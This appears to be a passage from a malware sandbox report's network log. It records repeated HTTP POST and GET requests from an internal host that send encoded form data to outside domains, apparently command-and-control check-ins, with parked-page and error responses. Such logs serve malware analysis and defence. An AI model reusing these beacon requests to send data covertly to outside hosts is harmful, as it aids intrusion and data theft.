                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 47 42 32 49 31 36 62 61 4c 6c 4a 33 66 51 32 64 47 64 62 2f 74 71 2f 78 32 2b 71 55 68 48 30 51 59 52 65 36 33 51
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDGB2I16baLlJ3fQ2dGdb/tq/x2+qUhH0QYRe63Q
                                                                                                                                                  Nov 14, 2024 15:43:28.262522936 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:28 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  56192.168.2.550035217.70.184.5080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:29.940295935 CET1676OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 78 63 6b 42 56 57 6a 37 71 5a 2f 61 74 6e 63 42 31 76 51 2f 75 75 4d 66 72 6c 63 70 6b 47 71 35 33 55 2b 71 6d 38 31 55 4d 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 38 48 38 76 79 4c 4c 48 41 4d 46 6a 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qceGMrIwxckBVWj7qZ/atncB1vQ/uuMfrlcpkGq53U+qm81UMSv4LXKEKV9d7qhPTL6dYDGOmnpA3GFBJ1jxnVacsKtmRZ4pDT5c9mlXSFWdanO8H8vyLLHAMFjmuZjo5DVzS9Yq47Mc0hlbl1NnsX6CAKG31hK689mtcUKPAhaNpMQq979kYDODo/EGzn9WzCG6moFyqpqZ+rShHu7FiHmDao6ZRDPixUU6V7iPlXFRMDRlKy5ytlONRaw0zWPP/HnzqpWHvAMnvnepp/Xabkv03vZ+DWCZNknwkGV/jIZ6UtSjEhwkeaO5+g2QlGYpq4MzdndhzU7kun06WI6C2raMf5HF1p6UZSuG0YJgnJVnIu6ey1x8hdS8HcguFFAGpcf3L2NmwlDcR5K5vKLYHeJuFYcosSZY12j1qv1n085guofT4V1go5N/COB2a2E1VVzE8Z5a4Wz76OCobY63va9dIWF8nensywECy2u2TTeyND5KBa/tYVcBF67A1jA3nHEqAP6rRnTfYMxcFh6JBTCxdvgTyPNPX7fKUQVXCIK4KNbPjSLg75klUAyWdH8OGhAc8c6FTH9kv/iYYQZBFcGneqVSaw9knztc/xaAWELBn08UObm43ja5ASJI5QaWEB7FQ1n5UgVn6szFpfJ7fZWNC5IQVaaHO4q0+XziK1OUeioc1WPBd2xsD9Wd5O3Rr49X/ONkaY3dGbPK28S9E+B/y2nCPIHxEYYgFU0VoriBrv5JC+GBmODak7aeNdZCzM3Eh1KTyepwZrCW63Q/36MItEm3TeNgcjkgLU3ygEyl2GcqW3nWm82vnXkSnspRMjT [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:43:31.025857925 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:30 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  57192.168.2.550036217.70.184.5080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:32.492810965 CET382OUTGET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:43:33.305784941 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:33 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-0daadd92cfa849849c9c0299dfd8e709';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 30 64 61 61 64 64 39 32 63 66 61 38 34 39 38 34 39 63 39 63 30 32 39 39 64 66 64 38 65 37 30 39 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-0daadd92cfa849849c9c0299dfd8e709';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                                                                                                  Nov 14, 2024 15:43:33.305825949 CET1236INData Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                                  Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                                                                                                  Nov 14, 2024 15:43:33.305862904 CET166INData Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                                  Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  58192.168.2.550037199.59.243.22780
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:38.443517923 CET663OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 42 6c 2b 49 79 39 4d 47 33 35 58 77 43 65 63 33 7a 56 46 43 4c 71 56 6a 44 59 65 77 56 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CBl+Iy9MG35XwCec3zVFCLqVjDYewVHkdks6XJ4=
                                                                                                                                                  Nov 14, 2024 15:43:39.095066071 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:39 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 2a24c07f-4e46-40d5-929a-685f072cd2d5
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=2a24c07f-4e46-40d5-929a-685f072cd2d5; expires=Thu, 14 Nov 2024 14:58:39 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:43:39.095204115 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmEyNGMwN2YtNGU0Ni00MGQ1LTkyOWEtNjg1ZjA3MmNkMmQ1IiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  59192.168.2.550038199.59.243.22780
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:40.988610983 CET683OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 47 74 7a 51 51 70 68 6c 6d 4e 48 48 38 4b 4a 65 76 67 64 44 48 4a 44 54 32 76 59 6a 4d 69 51 43 4c 71 74 47 4f 4e
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrGtzQQphlmNHH8KJevgdDHJDT2vYjMiQCLqtGON
                                                                                                                                                  Nov 14, 2024 15:43:41.636209965 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:43:40 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 68812700-9595-4db1-a7b7-1e9b8822ac8f
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=68812700-9595-4db1-a7b7-1e9b8822ac8f; expires=Thu, 14 Nov 2024 14:58:41 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:43:41.636749029 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
